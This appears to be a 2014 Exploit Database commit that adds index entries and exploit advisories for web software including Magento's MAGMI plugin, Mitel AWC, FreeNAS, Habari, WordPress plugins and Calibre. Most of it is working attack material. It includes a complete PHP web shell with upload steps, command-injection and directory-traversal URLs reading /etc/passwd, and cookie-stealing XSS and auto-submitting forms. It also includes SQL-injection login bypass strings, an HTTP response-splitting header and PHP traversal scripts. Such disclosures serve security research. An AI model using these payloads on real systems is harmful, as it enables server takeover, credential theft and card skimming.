Updated 11_02_2014

This commit is contained in:
Offensive Security 2014-11-02 04:45:04 +00:00
parent 9234afd706
commit 46921ae8d6
13 changed files with 200 additions and 37 deletions

View file

@ -31639,3 +31639,14 @@ id,file,description,date,author,platform,type,port
35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0
35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0
35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0
35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/45537/info
Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26

View file

@ -1,48 +1,58 @@
Exploit found date: 10/24/2014
Security Researcher name: Parvinder Singh Bhasin
Security Researcher name: Parvinder Bhasin
Contact info: parvinder.bhasin@gmail.com
twitter: @parvinderb <scorpio>
twitter: @parvinderb - scorpio
Currently tested version:
Magento version: Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater
Magento version: Magento CE - 1.8 older
MAGMI version: v0.7.17a older
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.
Download software link:
Magento server: http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks). This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files..etc. Essentially,
this gives attacker ability to execute remote commands on the vulnerable
server.
Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.
Steps to reproduce:
1. http://<a magentosite.com>/magmi/web/magmi.php
2. Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.
evil.php:
<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>
3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and
zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file
has been uploaded, it will say: Plugin packaged installed.
evil.php:
<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>
3. Your malicious evil.php file is extracted now. All you then need to do
is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you could really have access to the entire system. Download
any malware, install rootkits, skim credit card data ..etc.etc.

12
platforms/php/webapps/35124.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/45522/info
FreeNAS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected.
http://www.example.com/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45523/info
Openfiler is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0

10
platforms/php/webapps/35126.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45530/info
Habari is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Habari 0.6.5 is affected; other versions may be vulnerable as well.
http://www.example.com/system/admin/dash_status.php?status_data[1]=<script>alert('XSS');</script>
http://www.example.com/system/admin/dash_additem.php?additem_form=<script>alert('XSS');</script>

11
platforms/php/webapps/35131.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/45536/info
Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The following example input is available:
Username: anytext' or verified=1#
Password: arbitrary_text

16
platforms/php/webapps/35133.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/45539/info
The Mediatricks Viva Thumbs plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues using directory-traversal strings to confirm the existence of local files outside of the WordPress webroot. Information obtained can aid in launching further attacks.
http://www.example.com/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
http://www.example.com/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd
http://www.example.com/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
http://www.example.com/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts

17
platforms/php/webapps/35134.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/45541/info
ImpressCMS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
ImpressCMS 1.2.3 Final is vulnerable; other versions may also be affected.
<form action="http://www.example.com/modules/content/admin/content.php" method="post" name="main">
<input type="hidden" name="quicksearch_ContentContent" value=&#039;search"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="button_quicksearch_ContentContent" value="Search">
<input type="hidden" name="filtersel" value="default">
<input type="hidden" name="limitsel" value="15">
</form>
<script>
document.main.submit();
</script>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45545/info
The Classified component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi]

10
platforms/php/webapps/35136.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45548/info
The Accept Signups Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Accept Signups 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,
101, 108, 108, 111, 32, 58, 68, 32))</script>

13
platforms/php/webapps/35137.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45550/info
Social Share is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
The following example input is available:
Vulnerable code: $referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer");
HTTP query ("Referer" field):
Referer: http://www.example.com/\r\n[second new response]

View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/45532/info
Calibre is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks.
Calibre 0.7.34 is vulnerable; other versions may also be affected.
<?php
error_reporting(E_ALL);
$url = "http://www.example.com/static/../jquery.simulate.js";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$resp = curl_exec($ch);
curl_close($ch);
echo $resp;
?>
<?php
error_reporting(E_ALL);
$url = "http://www.example.com/static/../../../../windows/win.ini.";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$resp = curl_exec($ch);
curl_close($ch);
echo $resp;
?>
http://www.example.com/browse/search?query=<script>alert('waraxe')</script>